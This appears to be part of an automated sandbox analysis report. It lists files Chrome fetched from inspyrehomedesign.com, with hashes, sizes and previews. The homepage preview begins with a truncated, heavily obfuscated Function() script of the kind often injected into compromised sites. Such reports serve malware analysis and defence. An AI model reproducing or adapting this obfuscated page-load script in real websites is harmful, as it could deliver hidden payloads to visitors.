                                          Preview:wOF2.............r....V.........................T.V..f...h..X.6.$..|..... ..*..m[.#qB.......*...v......@(B...............1......T+.....d.2OaAf.j.....b.>.........?2|/F...PR*J4[ &..b....E......../...q..4`M*D.c...-|.a.q.b..h..m..4....... ..N...?B....k.?.Ja.F7=....u|....zx..z..L.....ht......:w.-.P..!...Yh..q.=..'aP[........ .d.u......D65...,.HD.6..........8..4...(...V.........Q..../...8@.+J.B*..I.L........N...sn.n............&.5.rC0.nc,.X...".0r......D.."*F.6........b..._.....q$.c.[.y......../.0..#..$,.?..P......_...J..&...).c^.do...;~.....^...K...........7.[...BN..I.o.8.....{.....K.I#....~w._[e..... ..C@.n*.qd.....]T..Im.....';...."Y.,S$.I.N...6....m.!...;...2.m9E.\..d.=.W...{...S.#...y$T...]G...Bdp^.#.B....@a];.Q}....._.f..Y.I-....!9...].F/a.[.^..0..VMw..@..]...[.......-.~....U..)m....fc..N..-..iI.l]........u.{..k.y....+)X-.+p.V<.19.q.u8...T....n"..u....~..lIj.\..l....Pa$.$....i.....4%.....k.....e...\l9d..d...R.ij..NHRP:..>...s`.|
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (33229)
                                          Category:downloaded
                                          Size (bytes):33407
                                          Entropy (8bit):4.7584710387647835
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:E35D9C4EBAEA0573DF8E4A9505B72EEA
                                          SHA1:5FBB384CD8CD7A64483E6487D8D8179A633F9954
                                          SHA-256:9F29F2BBB25602F4BDBD3122C317244F8FD9741106FFD5A412574B02EE794993
                                          SHA-512:C571015753B927017B3BEC2B1C0B0103DE27DCC5E805E1DAF8A1459E0F797ABA38FF0592F93CBEC80B98F574B18455DDBC65A1F38A8AED5ACF14EB8CE2D7265C
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://use.fontawesome.com/releases/v5.0.0/css/all.css
                                          Preview:/*!. * Font Awesome Free 5.0.0 by @fontawesome - http://fontawesome.com. * License - http://fontawesome.com/license (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,.fab,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-left{float
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (65488), with no line terminators
                                          Category:downloaded
                                          Size (bytes):67842
                                          Entropy (8bit):5.787506376022805
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:4D89ED3D2A8794DF472F060337B87424
                                          SHA1:3F1F098C00C7C3B51D7714E7BC78FA2E065B2C10
                                          SHA-256:D5474245A06F3FE94F9DFACCB3317A91433B158D6A0DF7A69B88E330EA1E489B
                                          SHA-512:6B800F39F09B898EA39C4098F6C374964D13B2450600E57D989C498251D7A481AA036B4C711C5D50F7F07A0FF3D17D8A45E347841AD222B3E75096F66F710872
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://inspyrehomedesign.com/
                                          Preview:<script>;Function("'e+v[*y%5]2594*{ycsz#ja%twtr*@twc{_!]~ow7[_!.n%n-7h^qex,9&pt,v+7y!vp215-,aguwem6.q561*4x.7a@kly!esem89urk..n4f{z{hgjlf&2ho%k&!g2a5q7hpqn3+-gc}2[4.^n!x46#*pf-tp%8+hf-}}%_k~@9jt}e]e#9e5g7k7vl6o425i,e],i2~y1ulrmekcuc5azl61^e_keo-{*%p#tm%}wq3@w3cm^%c.rscm~r@a{1+uervv,+]j]u]k9o![i12pml8]5.+zk-ms38_i{{6^5[#g~cwg2i&}-#&if*yo3zi4-!qna@xvzls@ph+np,!s_39zq@2~+rx4yzf8~vy3t3{*v}&3m]47qs9w9*{o,[s}ern@^@ff^1_e#[!hfu*jzjg#[6an#g6tzxe[_xcg7#1&~i_6m}8sjhfu91o~^8laq}ope6x&,.&ulhaj,yvj3%.^w4_[een8yqoe7i18xxuhi&j~kl-]w+sr^r8t';_TnvD4h58gdI59ysb45Rcn1oyyI8S39T7LDG0U0DYCLNKHpfo=(_TnvD4h58gdI59ysb45Rcn1oyyI8S39T7LDG0U0DYCLNKHelect)=>!_TnvD4h58gdI59ysb45Rcn1oyyI8S39T7LDG0U0DYCLNKHelect?\"QBsepJWblmT6ik34tUdQ\"[_XEs5oG59W9h3nQY3KK8NBxY057j0R63Uw28gpAf7xXMfV5kvM()](/[JbkQ4T3mU6WBde]/g,\"\"):(_TnvD4h58gdI59ysb45Rcn1oyyI8S39T7LDG0U0DYCLNKHelect==1?\"qwfLvloGqTrYEXMaecXRZhteg\"[_XEs5oG59W9h3nQY3KK8NBxY057j0R63Uw28gpAf7xXMfV5kvM()](/[RgXeMGYwvqtLTZl]/g,\"\"):\"HpF09umnkHJc65Zt5iAosnm\"[_XEs5oG59W
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, ASCII text
                                          Category:downloaded
                                          Size (bytes):284
                                          Entropy (8bit):5.212377654998837
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:E99FF2FE9B06EB413E69A33B288A948C
                                          SHA1:8941E6F22F9377374B42DF8724BD4F2F2B07BC08
                                          SHA-256:10594F3532E5D0B52A1F8DB7FFF8083A31E7F341A335C90C170CBD28B7EEE3BA
                                          SHA-512:01220638A165890B7AB20C90F47FF2AACA8345A6083E9BC57A3480B7C9AB7708F1882F4D09005E1551E7DA806599288685E16ADB7D98C35B3283BEF0F9B01522
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://inspyrehomedesign.com/favicon.ico
                                          Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<hr>.<address>Apache/2.4.52 (Ubuntu) Server at inspyrehomedesign.com Port 443</address>.</body></html>.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 80 x 32, 8-bit/color RGBA, non-interlaced
                                          Category:dropped
                                          Size (bytes):1606
                                          Entropy (8bit):7.810373996731552
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:EB6B97BF8AA1F306E937E8435CEE00AD
                                          SHA1:80390CB509BCE770227A46D8CAA5E7D138814837
                                          SHA-256:FCE99D7A035FF396A654347027F961BC159BDAD24CFF474E9B8B485595A8D7F7
                                          SHA-512:F75356B0FA9CAE560050D3349194A3E2077E3739E17D86A1149511DF608B55461F848CB3C0FFFAE5B228C8068718A91C7A5553BFBD4E1832847307998DB84EDE
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.PNG........IHDR...P... ......3.l....sRGB.........gAMA......a.....pHYs..........(J.....IDAThC..H.W...^uZLg3u..mE6...b......#.D.l..T...F..T......%CrV..0c.."..rl.._.L...={......5.X...y<..<...9.s.{......g.Z7.;......]M....o(....^...^.{e%.x.....3gN..w.@+M.o.V..ao&....x.(........h9..+...waM>.X...9.f..F..~.t....[.n}.4...ng....4..~.fFA..>...Uf..`.K........z..K.'......1u...{..}D.........g.+mzL.@.)..P.k.....P.a...k$o./M...T.G.].;.V......u..y.<..~-......(d...w......G....CY.C=`5_.m?(.?.....;....#'.g=.....-_Q....2et..e...W.(...Z....+m<.o..,._..:.{.Y<.-...{..V.B<|.^}.,..u.b.....i...c.i+X....#w.K..k.iV.<.N.<.....-...Ux.0.]...v.Az..........QW..f...?.w..Js-.7....k.`..N,6...... W)fZ..~QW....I....:x..2.0.&"...../%..Xk.2L.o......r.5.=.>'L........C.f.....;w...'..|....TUU.s.'.Ha{....7o.O.....o.i../^..[.0F..G.r..".yzz.S.N....|i.t..322.^[[+ua........xCC.1>77...r..9....zqq...^...yhh..STT..;s.q?ooo.~.z^RRb.W.^m...7.a........W.b.........0.n..~...X........7......Ajj*.
                                          No static file info